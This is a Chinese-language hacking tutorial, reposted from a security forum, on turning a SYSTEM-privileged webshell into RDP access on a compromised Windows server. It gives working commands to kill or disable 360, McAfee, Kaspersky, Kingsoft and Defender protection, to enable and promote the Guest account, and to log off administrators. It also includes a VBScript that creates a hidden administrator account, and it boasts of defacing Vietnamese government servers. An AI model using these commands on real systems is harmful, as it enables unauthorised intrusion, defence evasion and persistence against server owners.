[集合]解决system权限3389无法添加的用户情况

Webshell有了SYSTEM权限，却无法成功添加administrators用户，因此导致无法成功连接3389。总结原因有以下几点：
I.杀软篇
1,360杀毒软件
2,麦咖啡杀毒软件
3,卡巴斯基杀毒软件
4,其他杀毒软件或防护软件
II.策略篇
1,3389端口变更
2,莫名其妙无法添加账户
3,管理员限制篇
4,系统已达最大连接数处理

———————–I.
杀软篇—————————–
1,360杀毒软件
经常会在国内的一些服务器上遇到360杀毒和防护软件，如果使用webshell进行添加administrators账户时，360会阻止并提示管理员，导致添加失败。
那么如何突破360的限制？360不能完美的支持Server系统，也就是说，其实很简单。
阻止Webshell添加账户的主要是360主动防御，而结束了主动防御，360杀毒根本就是摆设。
那天手痒去百度搜了下blackbap.org这个关键字，居然出现在360论坛上，原来是Silic开发的php大马被某个服务器管理员举报到360论坛上去了。
大致就是这个网管把webshell传上去，说360查不出来，希望更新病毒库云云，结果360工程师看了以后说更新360就能杀到了，结果网管说更新了
还是杀不到。然后工程师说装什么什么的，网管说装了，还是杀不到，然后工程师就缩头乌龟了。可见360在server上面很垃圾，用小白的话说就是，请把
拿着打口水仗的钱多花在研发产品上吧。
好了，扯淡到此为止，突破方法也该千呼万唤始出来了。
先执行tasklist看一下进程列表，然后

 

 

 

 

 

 

Default

 

taskkill /im 进程名.exe /f

1	taskkill /im 进程名.exe /f

把主动防御结束
360相关进程如下：
360tray.exe,360rp.exe,Zhudongfangyu.exe,360rps.exe，这几个灭了，基本上360的阻碍就清除了，该加账户加账户，该pr就pr了。
Windows下Apache+PHP的特殊性，导致很多php站的webshell有SYSTEM的权限，所以结束360简直易如反掌啊。
即使不是SYSTEM，也有办法的，例如ASPX，asp.net有个操纵进程的功能。看代码（直接从webshell上面拔下来的）：

 

 

 

 

 

 

Default

 

protected void kp_Click(object sender, EventArgs e)
{
Process[] kp = Process.GetProcesses ();
foreach ( Process kp1 in kp )
if (kp1.ProcessName == ListBox1.SelectedValue.ToString())
{
try
{
kp1.Kill();
Response.Write("<script>alert('Killed');location.href='?'</" + "script>");
ListBox1.Items.Clear();

}
catch (Exception x)
{
Response.Write(x.Message.ToString());
Response.End();
}
}
}

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

protected void kp_Click(object sender, EventArgs e)     {     Process[] kp = Process.GetProcesses ();     foreach ( Process kp1 in kp )     if (kp1.ProcessName == ListBox1.SelectedValue.ToString())     {     try     {     kp1.Kill();     Response.Write("<script>alert('Killed');location.href='?'</" + "script>");     ListBox1.Items.Clear();       }     catch (Exception x)     {     Response.Write(x.Message.ToString());     Response.End();     }     }     }

asp.net的这一个kill()函数即使是IIS+ASPX的users用户组依然可以轻松杀死360。
有些SYSYTEM权限却干不掉360，例如360tray.exe,360safe.exe，可以先query
user看看管理员状态，因为很可能是管理员登陆以后运行了图形界面没关闭，系统不执行taskkill
所以logoff把管理员踢了，然后360有的进程就自己灭了，这种情况多出现在2008的server系统上

2,麦咖啡杀毒软件
以前就谈过了关于如何绕过麦咖啡杀毒软件获得3389登陆权限的文章。

文章在这里：http://www.91ri.org/5867.html

那么完整一下过程就是，启用Guest账户，修改Guest用户的密码，添加Guest为administrators用户组。
经过测试，麦咖啡的防护进程恐怕是突破的，于是cmd命令如下：

 

 

 

 

 

 

Default

 

net user guest /active:yes //将guest用户启用
net user guest silic!&11133 //修改guest密码
net localgroup administrators guest /add //添加guest到管理员用户组中

1 2 3

net user guest /active:yes          //将guest用户启用     net user guest silic!&11133        //修改guest密码     net localgroup administrators guest /add    //添加guest到管理员用户组中

这三条命令第二条或者第三条有时候可能不会显示命令执行成功，但是实际上只要是SYSTEM权限，就应该可以执行成功的，有无回显并不重要。

3,卡巴斯基
卡巴斯基的防护也是让人头疼的。关于突破卡巴斯基的方法，有很多。
调整系统时间，让卡巴的key失效，这就不说了。还有mkdir建立以非法字符“.”命名的文件夹，将pr等提权程序传进去。
SYSTEM突破卡巴的防御直接添加用户，恐怕不太容易，不过可以尝试，用taskkill结束进程的语句后面
& net user
add命令，同时执行结束进程和添加账户。
此方法尚未实践，但是理论上是可以的，因为卡巴不像麦咖啡，它可以直接被结束，但是立即就会重启进程。

4,金山防护软件
首先说KSafeSvc.exe, 当时不知道是什么玩意,
从文件名目测应该是个金山的东西。
这个进程即使是taskkill也是搞不定的…只要有它，net user
/add的时候，就算net.exe改名了，它也会弹出是否阻止的窗口(可能是它弹的，就算不是它弹的，也要干掉他才能添加)
但是有个命令叫ntsd，可以终结掉大部分进程，例如winlogon.exe
svchost.exe这些..
然后就ntsd -c q -p
PID结束了KSafeSvc.exe
然后说一下：金山毒霸+金山卫士+瑞星防火墙的组合
这个组合看似很牛逼，其实很傻逼。今天就遇到个system的php，上面就是金山毒霸+金山卫士+瑞星防火墙的组合
可以将如下代码保存到c:\windows\temp\a.vbs

 

 

 

 

 

 

Default

 

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","silic")
od.SetPassword "silic"
od.SetInfo
Set of=GetObject(os&"/silic",user)
oe.add os&"/silic"

1 2 3 4 5 6 7 8 9

set wsnetwork=CreateObject("WSCRIPT.NETWORK")     os="WinNT://"&wsnetwork.ComputerName     Set ob=GetObject(os)     Set oe=GetObject(os&"/Administrators,group")     Set od=ob.Create("user","silic")     od.SetPassword "silic"     od.SetInfo     Set of=GetObject(os&"/silic",user)     oe.add os&"/silic"

然后用如下命令执行，就能得到账户为silic密码为silic的管理员账户了：

 

 

 

 

 

 

Default

 

cscript c:\windows\temp\a.vbs

1	cscript c:\windows\temp\a.vbs

5,禁用服务法

 

 

 

 

 

 

Default

 

sc config 服务名 start= disabled

1	sc config 服务名 start= disabled

有时候mysql或者mssql等等提权的时候，会发生杀软无法结束，导致提权失败的情况。
我们给杀软服务设置为禁用，重启服务器，杀毒防护服务就不能运行。就无阻畅通了，例如：

 

 

 

 

 

 

Default

 

sc config MsMpSvc start= disabled

1	sc config MsMpSvc start= disabled

5,其他防护软件
见过很多非主流的防护软件，什么护卫盾啊，Safe3防篡改啊，还有各种类似程序，具体名字我忘了。
这些软件的突破方法和主流防护软件突破方法大致相同，结束进程，或者不使用添加账户，直接启用现有的Guest来突破监控，不赘述了
另外补充一种方法，就是将防护软件的服务从自动启动改为不启动，然后重启服务器。这种方法对绝大部分服务器有效。

——————————–II,策略篇—————————–
1,3389端口变更
进行3389添加账户前首先要知道3389到底开启没有。
目前只遇到过3389端口变更的例子，没见过不开启3389的例子。那为什么有的外网3389连不上呢？
原因很简单，3389端口变更了呗。找出来的方法再简单不过了netstat
-an查看所有开启的端口。
一个一个可疑的端口试未免太差劲了。netstat
-ano查看端口和使用端口的进程pid，然后Tasklist看一下有哪个svchost.exe进程的pid使用了端口
注意，是svchost.exe当中的某个。

2,莫名奇妙无法添加账户
什么是莫名奇妙？有些主机，Webshell是System权限，tasklist也看不到任何防护的进程，管理员也没在线，提权程序也添加不了，怎么搞？
有因必有果，这样的情况添加不了，多数是系统有组策略限制，通常限制的是密码最短长度。而这个组策略又多数是麦咖啡等防护软件设置上的。或者干脆就是装机的系统本身就GHO上了这个设置。
突破方法不用说了，把密码位数设置长一点就ok，原先密码是123456，现在改为1234abcd!@#$就过了
如果还是添加不上，可以尝试用vbs脚本来添加。

3,管理员限制
有些BT管理员很可恶，直接把c:\windows\system32的net.exe给删了或者换了，于是你直接net的时候会提示拒绝访问或者不是系统命令等等类似提示云云。
管理员看似很牛B，其实很傻逼，系统的net.exe没了，你自己传一个自己的net.exe就突破了。
当然，也有64位系统和你的程序不兼容的情况发生，他是64你就传64位的，很好搞。

4,达到最大连接限制
有时候添加了账户，但是连接提示最大连接数限制。管理员不在线，却占着线不让你上去，等管理员自己上线了，再把你删了。这种管理员够缺德的
对于这种上不去的，首先query
user查看在线的账户，然后看他的登陆ID，一般是0，最高不超过8，超过8说明服务器好久没重启了（这个没准的）
然后logoff
ID，就把对应ID的管理员踢掉了。然后就能登录了。
当然你在logoff的时候不要把自己logoff了，也不最好不要白天踢人。管理员在线被人踢掉的话，你懂的。—
—！
2011年和越南黑阔搞攻防切磋的时候，咱们网站的人就在人越南的gov服务器上乱搞，然后。。。咱网站的黑阔挂菊花聊天室，管理员就删啊删的，咱网站的
黑阔就logoff了管理员的账户，然后禁用和administrator。。。后来管理员就眼瞅着大家在菊花聊天室聊天，然后跑了半个小时去机房把网线
拔了。。。logoff命令真的很阴毒，尤其是对一些服务器不在本地的网站来说。。。

补充：
有些SYSYTEM权限却干不掉360，例如360tray.exe,360safe.exe，可以先query
user看看管理员状态
很可能是管理员登陆以后运行了图形界面没关闭，系统不执行taskkill
所以logoff把管理员踢了，然后360有的进程就自己灭了
多出现在2008的server系统上

link：http://bbs.blackbap.org/thread-2331-1-1.html

91ri.org：我就不点评这篇文章了，一看就知道挺不错的，虽然老了点，但值得收藏，转载过来与大家分享。

本文由网络安全攻防研究室（www.91ri.org）信息安全小组收集整理，转载请注明出处。